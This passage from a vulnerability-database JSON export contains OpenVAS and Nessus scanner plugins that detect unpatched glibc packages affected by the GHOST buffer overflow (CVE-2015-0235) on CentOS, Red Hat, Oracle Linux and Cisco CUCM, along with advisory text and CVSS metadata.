multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based 
buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\");\n script_tag(name: \"affected\", value: \"glibc on CentOS 7\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"CESA\", value: \"2015:0092\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2015-January/020908.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", 
rpm:\"glibc-headers~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:52:55", "bulletinFamily": "scanner", "description": "Check the version of glibc", "modified": "2017-07-10T00:00:00", "published": "2015-01-28T00:00:00", "id": "OPENVAS:1361412562310882107", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882107", "title": "CentOS Update for glibc CESA-2015:0090 centos5 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2015:0090 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882107\");\n script_version(\"$Revision: 6657 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:50:44 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-28 06:10:46 +0100 (Wed, 28 Jan 2015)\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for glibc CESA-2015:0090 centos5 \");\n script_tag(name: \"summary\", value: \"Check the version of glibc\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\");\n script_tag(name: \"affected\", value: \"glibc on CentOS 5\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"CESA\", value: \"2015:0090\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2015-January/020906.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~123.el5_11.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~123.el5_11.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~123.el5_11.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~123.el5_11.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~123.el5_11.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~123.el5_11.1\", 
rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-23T15:12:58", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-01-28T00:00:00", "id": "OPENVAS:1361412562310871307", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871307", "title": "RedHat Update for glibc RHSA-2015:0092-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2015:0092-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871307\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-28 06:10:35 +0100 (Wed, 28 Jan 2015)\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for glibc RHSA-2015:0092-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:0092-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-January/msg00033.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", 
rpm:\"glibc-devel~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n 
exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:23:23", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2015:0092 :\n\nUpdated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81031", "published": "2015-01-28T00:00:00", "title": "Oracle Linux 6 / 7 : glibc (ELSA-2015-0092) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0092 and \n# Oracle Linux Security Advisory ELSA-2015-0092 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81031);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/18 17:43:57\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"Oracle Linux 6 / 7 : glibc (ELSA-2015-0092) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0092 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004810.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004812.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) 
audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.0.4.el7_0.5\")) 
flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:34", "bulletinFamily": "scanner", "description": "According to its self-reported version, the remote Cisco Unified Communications Manager (CUCM) device is affected by a heap-based buffer overflow in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "modified": "2018-11-15T00:00:00", "id": "CISCO_CUCM_CSCUS66650-GHOST.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81546", "published": "2015-02-26T00:00:00", "title": "Cisco Unified Communications Manager Remote Buffer Overflow (CSCus66650) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81546);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus66650\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco Unified Communications Manager Remote Buffer Overflow (CSCus66650) (GHOST)\");\n script_summary(english:\"Checks the version of Cisco Unified Communications Manager (CUCM).\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote device is affected by a buffer overflow 
vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote Cisco Unified\nCommunications Manager (CUCM) device is affected by a heap-based\nbuffer overflow in the GNU C Library (glibc) due to improperly\nvalidating user-supplied input in the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis allows a remote attacker to cause a buffer overflow, resulting in\na denial of service condition or the execution of arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the relevant patch referenced in the Cisco bug advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/26\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/Cisco/CUCM/Version\");\nver_display = get_kb_item_or_exit(\"Host/Cisco/CUCM/Version_Display\");\napp_name = \"Cisco Unified Communications Manager (CUCM)\";\n\nfixed_ver = FALSE;\n\n# Advisory says 7.1.5 - 10.5.2\nif(ver =~ \"^7\\.\" &&\n ver_compare(ver:ver, fix:\"7.1.5\", strict:FALSE) >= 0 &&\n ver_compare(ver:ver, fix:\"8.0.0\", strict:FALSE) < 0\n )\n fixed_ver = \"8.6.1.20013.3\";\nelse if(ver =~ \"^8\\.\" && ver_compare(ver:ver, fix:\"8.6.1.20013.3\", strict:FALSE) < 0)\n fixed_ver = \"8.6.1.20013.3\";\nelse if(ver =~ \"^8\\.6\\.2\\.\" && ver_compare(ver:ver, fix:\"8.6.2.26158.1\", strict:FALSE) < 0)\n fixed_ver = \"8.6.2.26158.1\";\nelse if(ver =~ \"^10\\.0\\.\" && ver_compare(ver:ver, fix:\"10.0.1.13015.1\", strict:FALSE) < 0)\n fixed_ver = \"10.0.1.13015.1\";\nelse if(ver =~ \"^10\\.5\\.\" && ver_compare(ver:ver, fix:\"10.5.2.11008.1\", strict:FALSE) < 0)\n fixed_ver = \"10.5.2.11008.1\";\nelse if(ver =~ \"^11\\.0\\.\" && ver_compare(ver:ver, fix:\"11.0.0.98000.89\", strict:FALSE) < 0)\n fixed_ver = \"11.0.0.98000.89\";\nelse if(ver =~ \"^9\\.1\\.\" && ver_compare(ver:ver, fix:\"9.1.2.13078.1\", strict:FALSE) < 0)\n fixed_ver = \"9.1.2.13078.1\";\nelse\n audit(AUDIT_INST_VER_NOT_VULN, app_name, ver_display);\n\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Cisco bug ID : CSCus66650' +\n 
